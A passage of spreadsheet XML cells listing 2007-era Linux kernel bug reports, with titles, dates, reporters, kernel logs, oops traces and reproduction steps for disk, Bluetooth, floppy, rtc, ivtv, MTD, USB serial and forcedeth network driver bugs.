    <t>Most recent kernel where this bug did not occur: - Distribution: Ubuntu Hardware Environment: Lenovo T60 Software Environment: - Problem Description: Hitachi HTS722016K9SA00 NCQ does not play well with libata. Adding it to the libata-core blacklist helps. But I wonder, since there are so many Hitachi disks in this list. Can it really be that Hitachi does not get this right over so many different products? Sep 14 13:12:42 boomer kernel: [ 16.023709] ata3: SATA max UDMA/133 cmd 0xf884c500 ctl 0x00000000 bmdma 0x00000000 irq 218 Sep 14 13:12:42 boomer kernel: [ 16.601573] ata3: SATA link up 1.5 Gbps (SStatus 113 SControl 300) Sep 14 13:12:42 boomer kernel: [ 16.602373] ata3.00: ATA-8: Hitachi HTS722016K9SA00, DCDOC54P, max UDMA/133 Sep 14 13:12:42 boomer kernel: [ 16.602573] ata3.00: 312581808 sectors, multi 16: LBA48 NCQ (depth 31/32) Sep 14 13:12:42 boomer kernel: [ 16.603849] ata3.00: configured for UDMA/133 Sep 14 16:04:18 boomer kernel: [ 6722.232393] ata3.00: exception Emask 0x2 SAct 0x7ff99 SErr 0x0 action 0x2 frozen Sep 14 16:04:19 boomer kernel: [ 6722.232409] ata3.00: (spurious completions during NCQ issue=0x0 SAct=0x7ff99 FIS=005040a1:00000020) Sep 14 16:04:19 boomer kernel: [ 6722.232426] ata3.00: cmd 61/08:00:36:b5:37/00:00:0d:00:00/40 tag 0 cdb 0x0 data 4096 out [...] Sep 14 16:04:19 boomer kernel: [ 6722.232697] ata3.00: cmd 61/08:90:46:7d:43/00:00:0d:00:00/40 tag 18 cdb 0x0 data 4096 out Sep 14 16:04:19 boomer kernel: [ 6722.317209] ata3: soft resetting port Sep 14 16:04:19 boomer kernel: [ 6722.357466] ata3: SATA link up 1.5 Gbps (SStatus 113 SControl 300) Sep 14 16:04:19 boomer kernel: [ 6722.359557] ata3.00: configured for UDMA/133 Sep 14 16:04:19 boomer kernel: [ 6722.359593] ata3: EH complete Steps to reproduce: - Boot - Do stuff on disk - Read kernel.log</t>
  </si>
  <si>
    <t>Syslog flooded with "hci_scodata_packet: hci0 SCO packet for unknown connection handle 92" message</t>
  </si>
  <si>
    <t>2007-09-16 09:04 UTC</t>
  </si>
  <si>
    <t>Daniel Cheng</t>
  </si>
  <si>
    <t>2008-03-05 06:47 UTC</t>
  </si>
  <si>
    <t>I have a usb bluetooth dongle. when plugged, syslog is flooded with hci_scodata_packet: hci0 SCO packet for unknown connection handle 92 Is this the same as Bug 6833 ? Bus 002 Device 002: ID 0e5e:6622 Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 224 Wireless bDeviceSubClass 1 Radio Frequency bDeviceProtocol 1 Bluetooth bMaxPacketSize0 16 idVendor 0x0e5e idProduct 0x6622 bcdDevice 1.34 iManufacturer 0 iProduct 0 iSerial 0 bNumConfigurations 1</t>
  </si>
  <si>
    <t>OOPS in floppy sysfs</t>
  </si>
  <si>
    <t>2007-09-18 08:59 UTC</t>
  </si>
  <si>
    <t>2007-10-29 22:56 UTC</t>
  </si>
  <si>
    <t>The OOPS happens in floppy uevent file, not sure why it only happens if earlier file is read. To reproduce: cat /sys/devices/platform/floppy.0/* Unable to handle kernel paging request at ffffffff806b6680 RIP: [&lt;ffffffff8035269e&gt;] strnlen+0xe/0x40 PGD 203067 PUD 207063 PMD 37e11163 PTE 6b6000 Oops: 0000 [1] SMP last sysfs file: /devices/platform/floppy.0/uevent CPU 1 Modules linked in: autofs4 cpufreq_ondemand acpi_cpufreq video output sbs dock battery ac radeon drm ipv6 i2c_i801 i2c_core snd_hda_intel snd_seq_dummy button sky2 sg snd_seq_oss snd_seq_midi_event snd_seq sr_mod snd_seq_device snd_pcm_oss snd_mixer_oss snd_pcm cdrom iTCO_wdt iTCO_vendor_support snd_timer serio_raw rtc_cmos snd_page_alloc floppy ohci_hcd Pid: 3494, comm: sum Not tainted 2.6.23-rc6 #66 RIP: 0010:[&lt;ffffffff8035269e&gt;] [&lt;ffffffff8035269e&gt;] strnlen+0xe/0x40 RSP: 0018:ffff81005613fc28 EFLAGS: 00010297 RAX: ffffffff805cb68d RBX: ffff810066d5f038 RCX: ffffffff805d15f9 RDX: fffffffffffffffe RSI: ffffffffffffffff RDI: ffffffff806b6680 RBP: ffff81005613fc28 R08: 00000000ffffffff R09: ffff81005613fd38 R10: ffff81005613fc98 R11: 0000000000000246 R12: ffffffff806b6680 R13: ffff8100e6d5f037 R14: 0000000000000000 R15: 00000000ffffffff FS: 00002b074b6676f0(0000) GS:ffff8100026b4d40(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: ffffffff806b6680 CR3: 000000007e0e9000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process sum (pid: 3494, threadinfo ffff81005613e000, task ffff810037c93000) Stack: ffff81005613fc88 ffffffff80353ff6 ffff81005613fc58 ffff81005613fc98 000000007fffffff ffff810066d5f038 ffffffff805d15f9 ffff81005613fda8 0000000000000038 0000000000000000 ffff810056266000 ffff810066d5f000 Call Trace: [&lt;ffffffff80353ff6&gt;] vsnprintf+0x456/0x6a0 [&lt;ffffffff803542e3&gt;] sprintf+0xa3/0xb0 [&lt;ffffffff803d9d92&gt;] platform_uevent+0x22/0x30 [&lt;ffffffff803d5d4e&gt;] dev_uevent+0x20e/0x360 [&lt;ffffffff803d4ae9&gt;] show_uevent+0xf9/0x140 [&lt;ffffffff8027848e&gt;] get_page_from_freelist+0x2ee/0x3f0 [&lt;ffffffff802785ef&gt;] __alloc_pages+0x5f/0x350 [&lt;ffffffff802123f1&gt;] arch_get_unmapped_area+0xf1/0x280 [&lt;ffffffff803d45dd&gt;] dev_attr_show+0x1d/0x20 [&lt;ffffffff802ebc7b&gt;] sysfs_read_file+0x9b/0x130 [&lt;ffffffff8029bbc1&gt;] vfs_read+0xe1/0x1a0 [&lt;ffffffff8029c0a0&gt;] sys_read+0x50/0x90 [&lt;ffffffff8020c28c&gt;] tracesys+0xdc/0xe1 Code: 80 3f 00 74 22 48 89 f8 eb 0a 80 38 00 0f 1f 44 00 00 74 0e RIP [&lt;ffffffff8035269e&gt;] strnlen+0xe/0x40 RSP &lt;ffff81005613fc28&gt; CR2: ffffffff806b6680</t>
  </si>
  <si>
    <t>Duplicate file names "rtc" detected</t>
  </si>
  <si>
    <t>2.6.23-rc6-mm1 - 2.6.23-rc8-mm1</t>
  </si>
  <si>
    <t>2007-09-18 14:51 UTC</t>
  </si>
  <si>
    <t>2009-03-18 10:11 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Fedora Devel Hardware Environment: CK804 + AMD X2 Problem Description: Duplicate file names "rtc" detected. Call Trace: [&lt;ffffffff8100d69e&gt;] show_trace+0x34/0x4f [&lt;ffffffff8100d6cb&gt;] dump_stack+0x12/0x17 [&lt;ffffffff810e07b3&gt;] proc_register+0x156/0x16c [&lt;ffffffff810e083c&gt;] create_proc_entry+0x73/0x8a [&lt;ffffffff811d0779&gt;] rtc_proc_add_device+0x1d/0x3e [&lt;ffffffff811cf999&gt;] rtc_device_register+0x19c/0x231 [&lt;ffffffff881ff57d&gt;] :rtc_cmos:cmos_do_probe+0xa5/0x221 [&lt;ffffffff81171bf0&gt;] pnp_device_probe+0x7b/0x9f [&lt;ffffffff8119cee3&gt;] driver_probe_device+0xf7/0x174 [&lt;ffffffff8119d0a8&gt;] __driver_attach+0x90/0xcc [&lt;ffffffff8119c25c&gt;] bus_for_each_dev+0x43/0x6e [&lt;ffffffff8119c5e2&gt;] bus_add_driver+0x7a/0x1c4 [&lt;ffffffff8105f900&gt;] sys_init_module+0x1601/0x17a6 [&lt;ffffffff8100bf4e&gt;] system_call+0x7e/0x83 [&lt;000000316e2d200a&gt;] rtc_cmos 00:04: rtc core: registered rtc_cmos as rtc0 rtc0: alarms up to one year, y3k</t>
  </si>
  <si>
    <t>ivtv: possible circular locking dependency detected</t>
  </si>
  <si>
    <t>2.6.23-rc6.mm1 - 2.6.23-rc8-mm1</t>
  </si>
  <si>
    <t>2007-09-18 14:58 UTC</t>
  </si>
  <si>
    <t>2007-10-13 02:05 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Devel Hardware Environment: PVR 150 Problem Description: ======================================================= [ INFO: possible circular locking dependency detected ] 2.6.23-0.186.rc6.mm1.fc8 #1 ------------------------------------------------------- totem/3254 is trying to acquire lock: (&amp;itv-&gt;serialize_lock){--..}, at: [&lt;ffffffff88220cd0&gt;] ivtv_v4l2_open+0x93/0x2b3 [ivtv] but task is already holding lock: (videodev_lock){--..}, at: [&lt;ffffffff8819f087&gt;] video_open+0x38/0x157 [videodev] which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -&gt; #1 (videodev_lock){--..}: [&lt;ffffffff81057529&gt;] __lock_acquire+0xa79/0xc72 [&lt;ffffffff81057b0f&gt;] lock_acquire+0x5a/0x73 [&lt;ffffffff81264abd&gt;] __mutex_lock_slowpath+0xe6/0x286 [&lt;ffffffff8819c1da&gt;] video_register_device+0x9c/0x232 [videodev] [&lt;ffffffff88229f1e&gt;] ivtv_streams_setup+0x25b/0x3e8 [ivtv] [&lt;ffffffff882200a2&gt;] ivtv_probe+0x10e7/0x12db [ivtv] [&lt;ffffffff81132902&gt;] pci_device_probe+0xd1/0x138 [&lt;ffffffff8119cee3&gt;] driver_probe_device+0xf7/0x174 [&lt;ffffffff8119d0a8&gt;] __driver_attach+0x90/0xcc [&lt;ffffffff8119c25c&gt;] bus_for_each_dev+0x43/0x6e [&lt;ffffffff8119c5e2&gt;] bus_add_driver+0x7a/0x1c4 [&lt;ffffffff81132ae4&gt;] __pci_register_driver+0x68/0x9a [&lt;ffffffff8821ef42&gt;] module_start+0x8b/0xb7 [ivtv] [&lt;ffffffff8105f900&gt;] sys_init_module+0x1601/0x17a6 [&lt;ffffffff8100bf4e&gt;] system_call+0x7e/0x83 [&lt;000000316e2d200a&gt;] 0x316e2d200a [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff -&gt; #0 (&amp;itv-&gt;serialize_lock){--..}: [&lt;ffffffff8105742a&gt;] __lock_acquire+0x97a/0xc72 [&lt;ffffffff81057b0f&gt;] lock_acquire+0x5a/0x73 [&lt;ffffffff81264abd&gt;] __mutex_lock_slowpath+0xe6/0x286 [&lt;ffffffff88220cd0&gt;] ivtv_v4l2_open+0x93/0x2b3 [ivtv] [&lt;ffffffff8819f136&gt;] video_open+0xe7/0x157 [videodev] [&lt;ffffffff810a4282&gt;] chrdev_open+0x149/0x198 [&lt;ffffffff810a03b8&gt;] __dentry_open+0xd9/0x1b0 [&lt;ffffffff810a0543&gt;] do_filp_open+0x2a/0x38 [&lt;ffffffff810a0597&gt;] do_sys_open+0x46/0xc3 [&lt;ffffffff8100c0e5&gt;] tracesys+0xdc/0xe1 [&lt;000000316ee0dd9f&gt;] 0x316ee0dd9f [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff other info that might help us debug this: 1 lock held by totem/3254: #0: (videodev_lock){--..}, at: [&lt;ffffffff8819f087&gt;] video_open+0x38/0x157 [videodev] stack backtrace: Call Trace: [&lt;ffffffff8100d69e&gt;] show_trace+0x34/0x4f [&lt;ffffffff8100d6cb&gt;] dump_stack+0x12/0x17 [&lt;ffffffff8105597c&gt;] print_circular_bug_tail+0x69/0x72 [&lt;ffffffff8105742a&gt;] __lock_acquire+0x97a/0xc72 [&lt;ffffffff81057b0f&gt;] lock_acquire+0x5a/0x73 [&lt;ffffffff81264abd&gt;] __mutex_lock_slowpath+0xe6/0x286 [&lt;ffffffff88220cd0&gt;] :ivtv:ivtv_v4l2_open+0x93/0x2b3 [&lt;ffffffff8819f136&gt;] :videodev:video_open+0xe7/0x157 [&lt;ffffffff810a4282&gt;] chrdev_open+0x149/0x198 [&lt;ffffffff810a03b8&gt;] __dentry_open+0xd9/0x1b0 [&lt;ffffffff810a0543&gt;] do_filp_open+0x2a/0x38 [&lt;ffffffff810a0597&gt;] do_sys_open+0x46/0xc3 [&lt;ffffffff8100c0e5&gt;] tracesys+0xdc/0xe1 [&lt;000000316ee0dd9f&gt;] INFO: lockdep is turned off. ivtv0: Loaded v4l-cx2341x-enc.fw firmware (376836 bytes) ivtv0: Encoder revision: 0x02060039 cx25840 2-0044: loaded v4l-cx25840.fw firmware (16382 bytes)</t>
  </si>
  <si>
    <t>MEMSETOOBSEL mtd ioctl not implemented in the kernel</t>
  </si>
  <si>
    <t>2.6.latest</t>
  </si>
  <si>
    <t>2007-09-19 17:06 UTC</t>
  </si>
  <si>
    <t>Deepak Saxena</t>
  </si>
  <si>
    <t>2008-09-24 07:15 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Unknown Distribution: Hardware Environment: All Software Environment: Problem Description: See http://lists.infradead.org/pipermail/linux-mtd/2007-June/018682.html and the continuation of the discussion at http://lists.infradead.org/pipermail/linux-mtd/2007-July/018922.html for details. In summary, commit ff268fb8791cf18df536113355d7184007c269d9 removed the MEMSETOOBSEL ioctl() but the MTD tools (nandwrite) still use it. MEMGETOOBSEL is still in the kernel, so either this is a kernel bug and MEMGETOOBSEL should be added, or the tool needs to be rewritten to not use the ioctls and MEMGETOOBSEL needs to be deleted from the kernel. Filling a bug b/c the email thread died and this is an obvious bug.</t>
  </si>
  <si>
    <t>USB Serial not sending uevent on device disconnect if port open</t>
  </si>
  <si>
    <t>2.6.20.15 and 2.6.19.2</t>
  </si>
  <si>
    <t>2007-09-20 14:05 UTC</t>
  </si>
  <si>
    <t>Tysen Moore</t>
  </si>
  <si>
    <t>2007-12-03 06:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: still seen Distribution: KUbuntu 2.6.20.15 and Freescale BSP 2.6.19.2 Hardware Environment: Dell Optiplex x86 and Freescale ARM Development Board Software Environment: Vmware running Kubuntu on Windows XP and Embedded ARM development board Problem Description: If you have a program that opens a port using usb-serial and the USB device is disconnected there is no uevent indicating the ACTION "remove" for the tty device (e.g ttyUSB0). Once the port is closed the uevent is triggered and notifies the system the device has disconnected. When using the port there is no way to get notified that the device has disconnected. If no ports are open the uevent is sent without problems. I admit this could be a design decision but it seems like a limitation. I've seen the same problem in the cdc-acm driver. I've debugged the problem and found a potential solution. When the serial-&gt;kref is initialized it starts as one. When the port is opened it obviously gets incremented. The problem is that on the serial_disconnect there should be a kref_put for each port that calls tty_hangup. Also the port-&gt;tty-&gt;driver_data MUST be reset to NULL otherwise when the program closes its open port it will crash the driver. The proposed change is as follows: if (serial) { for (i = 0; i &lt; serial-&gt;num_ports; ++i) { port = serial-&gt;port[i]; if (port &amp;&amp; port-&gt;tty) { tty_hangup(port-&gt;tty); + /* prevents a close from an open device crashing the driver */ + port-&gt;tty-&gt;driver_data = NULL; + + /* we are also done with the reference used by tty */ + usb_serial_put(serial); } } /* let the last holder of this object * cause it to be cleaned up */ usb_serial_put(serial); } Steps to reproduce: 1. Connect usb-serial device 2. Open the port (e.g. ttyUSB0) using some program (e.g. minicom) 3. Disconnect the usb-serial device 4. problem occurs here, no uevent for the remove of ttyUSB0. /dev/ttyUSB0 is still around. 5. Can now kill/terminate the program that had the port open and the uevent will be sent out.</t>
  </si>
  <si>
    <t>(net forcedeth) MCP55 oops under heavy load</t>
  </si>
  <si>
    <t>2007-09-20 21:22 UTC</t>
  </si>
  <si>
    <t>Joshua Hoblitt</t>
  </si>
  <si>
    <t>2009-03-24 05:00 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: Gentoo 2007.0 Hardware Environment: amd64/x86_64 - 2 x Opeteron 2220s on Tyan S2927 motherboard Software Environment: Gentoo Linux, mostly 64-bit userland w/ multilib Problem Description:The kernel will either Oops from a NULL ptr dereference in forcedeth.c or the network interface will stop but the system will still respond on the serial while logging message about irq abuse into the dmesg. Steps to reproduce: We have an in house application which makes heavy use of NFS. Allowing this program to run for a few minutes will consistently reproduce the issue. It is almost always an Oops on a single CPU with perhaps a 1 out of 5 chance of seeing the dead network but system still up failure mode. This issue also occurs with 2.6.22 "gentoo-r3" but the "NULL" value being deferenced is 0x64 instead of 0x7c. Perhaps the strangest of all, having sysctl parameters set which affect tcp window scaling prevent a full stack trace in the oops message. Here is the most frequently see Oops message: Unable to handle kernel NULL pointer dereference at 000000000000007c RIP: [&lt;ffffffff880ad47d&gt;] :forcedeth:nv_rx_process_optimized+0xe6/0x36b PGD 219ee5067 PUD 219d9e067 PMD 0 Oops: 0000 [1] SMP CPU 3 Modules linked in: i2c_core autofs4 smsc37b787_wdt forcedeth rtc_cmos rtc_core rtc_lib aacraid 3w_9xxx 3w_xxxx atp870u aic7xxx arcmsr tg3 e1000 dm_mirror Pid: 0, comm: swapper Not tainted 2.6.23-rc7-git1 #1 RIP: 0010:[&lt;ffffffff880ad47d&gt;] [&lt;ffffffff880ad47d&gt;] :forcedeth:nv_rx_process_optimized+0xe6/0x36b RSP: 0018:ffff8102246b7eb8 EFLAGS: 00010246 RAX: 0000000014000000 RBX: 0000000000000000 RCX: 00000000d8000000 RDX: ffff810128048a80 RSI: 000000014ea5e810 RDI: ffff810123bf1870 RBP: 0000000034020362 R08: 0000000000000000 R09: 0000000000000048 R10: 0000000000000010 R11: ffff810123ba67c0 R12: ffff810121b8c740 R13: 0000000000000362 R14: ffff810121b8c000 R15: 0000000000000001 FS: 00002ba6eb3016d0(0000) GS:ffff81022464f480(0000) knlGS:0000000000000000 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: 000000000000007c CR3: 0000000219a57000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process swapper (pid: 0, threadinfo ffff810123b6e000, task ffff8102246aa000) Stack: However, removing these values from sysctl.conf allows a full stack trace to occur. net.core.rmem_max = 16777216 net.core.rmem_max = 16777216 net.ipv4.tcp_rmem = 4096 87380 16777216 net.ipv4.tcp_wmem = 4096 87380 16777216 net.core.netdev_max_backlog = 2500 Unable to handle kernel NULL pointer dereference at 000000000000007c RIP: [&lt;ffffffff880a047d&gt;] :forcedeth:nv_rx_process_optimized+0xe6/0x36b PGD 0 Oops: 0000 [1] SMP CPU 1 Modules linked in: i2c_core autofs4 smsc37b787_wdt rtc_cmos rtc_core rtc_lib forcedeth aacraid 3w_9xxx 3w_xxxx atp870u aic7xxx arcmsr tg3 e1000 dm_mirror Pid: 0, comm: swapper Not tainted 2.6.23-rc7-git1 #1 RIP: 0010:[&lt;ffffffff880a047d&gt;] [&lt;ffffffff880a047d&gt;] :forcedeth:nv_rx_process_optimized+0xe6/0x36b RSP: 0018:ffff810123b17e60 EFLAGS: 00010246 RAX: 0000000014000000 RBX: 0000000000000000 RCX: 00000000d8000000 RDX: 0000000034020042 RSI: 000000021b135810 RDI: ffff81012340c070 RBP: 0000000034020042 R08: ffff81022239b810 R09: ffff8101215b7000 R10: ffff81021bbf1900 R11: 0000000000000002 R12: ffff8101215b7740 R13: 0000000000000042 R14: ffff8101215b7000 R15: 000000000000001d FS: 00002b9da0edb6d0(0000) GS:ffff810123f01500(0000) knlGS:0000000000000000 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: 000000000000007c CR3: 0000000000201000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process swapper (pid: 0, threadinfo ffff810224662000, task ffff810123b10000) Stack: 00000040215b7000 ffff8101215b7740 0000000000000002 ffffc20002760000 ffff8101215b7000 0000000000000001 0000000000000000 ffffffff880a08a2 ffff8101215b7740 ffff8101215b7000 00000000000000ff ffffc20002760000 Call Trace: &lt;IRQ&gt; [&lt;ffffffff880a08a2&gt;] :forcedeth:nv_nic_irq_optimized+0x89/0x22c [&lt;ffffffff880a13cf&gt;] :forcedeth:nv_do_nic_poll+0x203/0x299 [&lt;ffffffff880a11cc&gt;] :forcedeth:nv_do_nic_poll+0x0/0x299 [&lt;ffffffff8023ded0&gt;] run_timer_softirq+0x16a/0x1df [&lt;ffffffff8023ad09&gt;] __do_softirq+0x55/0xc4 [&lt;ffffffff8020cd7c&gt;] call_softirq+0x1c/0x28 [&lt;ffffffff8020debd&gt;] do_softirq+0x2c/0x7d [&lt;ffffffff8021bbff&gt;] smp_apic_timer_interrupt+0x49/0x5e [&lt;ffffffff8020ae61&gt;] default_idle+0x0/0x3d [&lt;ffffffff8020c826&gt;] apic_timer_interrupt+0x66/0x70 &lt;EOI&gt; [&lt;ffffffff8020ae8a&gt;] default_idle+0x29/0x3d [&lt;ffffffff8020af5a&gt;] cpu_idle+0xbc/0xdf Code: 8a 43 7c 83 e0 f3 83 c8 04 88 43 7c 83 7b 6c 00 8b 83 a8 00 RIP [&lt;ffffffff880a047d&gt;] :forcedeth:nv_rx_process_optimized+0xe6/0x36b RSP &lt;ffff810123b17e60&gt; CR2: 000000000000007c Unable to handle kernel NULL pointer dereference&lt;0&gt;Kernel panic - not syncing: Aiee, killing interrupt handler! at 000000000000007c RIP: [&lt;ffffffff880a047d&gt;] :forcedeth:nv_rx_process_optimized+0xe6/0x36b PGD 109aaa067 PUD 109d15067 PMD 0 Oops: 0000 [2] SMP CPU 3 Modules linked in: i2c_core autofs4 smsc37b787_wdt rtc_cmos rtc_core rtc_lib forcedeth aacraid 3w_9xxx 3w_xxxx atp870u aic7xxx arcmsr tg3 e1000 dm_mirror Pid: 0, comm: swapper Tainted: G D 2.6.23-rc7-git1 #1 RIP: 0010:[&lt;ffffffff880a047d&gt;] [&lt;ffffffff880a047d&gt;] :forcedeth:nv_rx_process_optimized+0xe6/0x36b RSP: 0018:ffff8102246b3ae8 EFLAGS: 00010246 RAX: 0000000014000000 RBX: 0000000000000000 RCX: 00000000d8000000 RDX: 0000000000000020 RSI: 000000021b135810 RDI: ffff81012340c070 RBP: 0000000034020042 R08: ffff81021fbd8700 R09: ffff81021fb43900 R10: 00000000fc149542 R11: 0000000000000048 R12: ffff8101215b7740 R13: 0000000000000042 R14: ffff8101215b7000 R15: 0000000000000001 FS: 00002b9da0edb6d0(0000) GS:ffff81022464e480(0000) knlGS:0000000000000000 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: 000000000000007c CR3: 000000011dda7000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process swapper (pid: 0, threadinfo ffff810123b70000, task ffff8102246ac000) Stack: 00000040215b7740 ffff8101215b7740 0000000000000010 ffffc20002760000 ffff8101215b7000 0000000000000000 0000000000000503 ffffffff880a08a2 ffff810224690800 0000000000000000 0000000000000000 00000000000004fc Call Trace: &lt;IRQ&gt; [&lt;ffffffff880a08a2&gt;] :forcedeth:nv_nic_irq_optimized+0x89/0x22c [&lt;ffffffff80259828&gt;] handle_IRQ_event+0x25/0x53 [&lt;ffffffff8025ae2c&gt;] handle_edge_irq+0xe4/0x127 [&lt;ffffffff8020e12c&gt;] do_IRQ+0xf1/0x161 [&lt;ffffffff8020c101&gt;] ret_from_intr+0x0/0xa [&lt;ffffffff8027eba8&gt;] kfree+0x79/0x7e [&lt;ffffffff804bb042&gt;] kfree_skbmem+0x9/0x6f [&lt;ffffffff804e9089&gt;] tcp_ack+0x6c8/0x1914 [&lt;ffffffff804bb8dc&gt;] __alloc_skb+0x84/0x133 [&lt;ffffffff804ed317&gt;] tcp_rcv_established+0x7ac/0x8cd [&lt;ffffffff804f2a50&gt;] tcp_v4_do_rcv+0x30/0x344 [&lt;ffffffff8022d572&gt;] find_busiest_group+0x254/0x6d6 [&lt;ffffffff804f4f35&gt;] tcp_v4_rcv+0x81f/0x88a [&lt;ffffffff804da87c&gt;] ip_local_deliver+0xca/0x14c [&lt;ffffffff804dadbd&gt;] ip_rcv+0x4bf/0x502 [&lt;ffffffff804c21b6&gt;] process_backlog+0x84/0x102 [&lt;ffffffff804c23c0&gt;] net_rx_action+0xa8/0x1ad [&lt;ffffffff8023ad09&gt;] __do_softirq+0x55/0xc4 [&lt;ffffffff8020cd7c&gt;] call_softirq+0x1c/0x28 [&lt;ffffffff8020debd&gt;] do_softirq+0x2c/0x7d [&lt;ffffffff8020e179&gt;] do_IRQ+0x13e/0x161 [&lt;ffffffff8020ae61&gt;] default_idle+0x0/0x3d [&lt;ffffffff8020c101&gt;] ret_from_intr+0x0/0xa &lt;EOI&gt; [&lt;ffffffff8020ae8a&gt;] default_idle+0x29/0x3d [&lt;ffffffff8020af5a&gt;] cpu_idle+0xbc/0xdf Code: 8a 43 7c 83 e0 f3 83 c8 04 88 43 7c 83 7b 6c 00 8b 83 a8 00 RIP [&lt;ffffffff880a047d&gt;] :forcedeth:nv_rx_process_optimized+0xe6/0x36b RSP &lt;ffff8102246b3ae8&gt; CR2: 000000000000007c WARNING: at drivers/char/vt.c:3566 do_unblank_screen() Call Trace: &lt;IRQ&gt; [&lt;ffffffff803a7f05&gt;] do_unblank_screen+0x3e/0x120 [&lt;ffffffff8035ea15&gt;] bust_spinlocks+0x19/0x2c [&lt;ffffffff8054b5fc&gt;] oops_end+0x15/0x57 [&lt;ffffffff8054d025&gt;] do_page_fault+0x6f0/0x7d1 [&lt;ffffffff804b0db7&gt;] pci_conf1_read+0xbb/0xc6 [&lt;ffffffff804b0db7&gt;] pci_conf1_read+0xbb/0xc6 [&lt;ffffffff804b0e79&gt;] pci_conf1_write+0xb7/0xca [&lt;ffffffff8054b26d&gt;] error_exit+0x0/0x84 [&lt;ffffffff880a047d&gt;] :forcedeth:nv_rx_process_optimized+0xe6/0x36b [&lt;ffffffff880a03ee&gt;] :forcedeth:nv_rx_process_optimized+0x57/0x36b [&lt;ffffffff880a08a2&gt;] :forcedeth:nv_nic_irq_optimized+0x89/0x22c [&lt;ffffffff80259828&gt;] handle_IRQ_event+0x25/0x53 [&lt;ffffffff8025ae2c&gt;] handle_edge_irq+0xe4/0x127 [&lt;ffffffff8020e12c&gt;] do_IRQ+0xf1/0x161 [&lt;ffffffff8020c101&gt;] ret_from_intr+0x0/0xa [&lt;ffffffff8027eba8&gt;] kfree+0x79/0x7e [&lt;ffffffff804bb042&gt;] kfree_skbmem+0x9/0x6f [&lt;ffffffff804e9089&gt;] tcp_ack+0x6c8/0x1914 [&lt;ffffffff804bb8dc&gt;] __alloc_skb+0x84/0x133 [&lt;ffffffff804ed317&gt;] tcp_rcv_established+0x7ac/0x8cd [&lt;ffffffff804f2a50&gt;] tcp_v4_do_rcv+0x30/0x344 [&lt;ffffffff8022d572&gt;] find_busiest_group+0x254/0x6d6 [&lt;ffffffff804f4f35&gt;] tcp_v4_rcv+0x81f/0x88a [&lt;ffffffff804da87c&gt;] ip_local_deliver+0xca/0x14c [&lt;ffffffff804dadbd&gt;] ip_rcv+0x4bf/0x502 [&lt;ffffffff804c21b6&gt;] process_backlog+0x84/0x102 [&lt;ffffffff804c23c0&gt;] net_rx_action+0xa8/0x1ad [&lt;ffffffff8023ad09&gt;] __do_softirq+0x55/0xc4 [&lt;ffffffff8020cd7c&gt;] call_softirq+0x1c/0x28 [&lt;ffffffff8020debd&gt;] do_softirq+0x2c/0x7d [&lt;ffffffff8020e179&gt;] do_IRQ+0x13e/0x161 [&lt;ffffffff8020ae61&gt;] default_idle+0x0/0x3d [&lt;ffffffff8020c101&gt;] ret_from_intr+0x0/0xa &lt;EOI&gt; [&lt;ffffffff8020ae8a&gt;] default_idle+0x29/0x3d [&lt;ffffffff8020af5a&gt;] cpu_idle+0xbc/0xdf And here are the messages that appear in the dmesg when the network dies without causing an oops (we've only seen this twice): eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. eth0: too many iterations (6) in nv_nic_irq. I also should add that it is only very heavy network traffic that causes this issue as this system has been in use for months without noticing any problems until we started trying to run this particular applicationt. It may also be worth noting that the application is doing a far amount of access to a volume that is exported from the system via NFS that is then mounted locally (by the automounter). Note: all of the attached files were taken from an identical system as the exact system is "off site" to me and I can't access it until tomorrow. While this system is identical it is possible that the motherboard has a slightly different hw ver or bios on it.</t>
  </si>
  <si>
    <t>pata_via libata: Eirroneous "limited to UDMA/33 due to 40-wire cable"</t>
  </si>
  <si>
    <t>2.6.24-rc1</t>
  </si>
  <si>
    <t>2007-09-20 23:31 UTC</t>
  </si>
  <si>
    <t>2008-06-10 08:06 UTC</t>
  </si>
  <si>
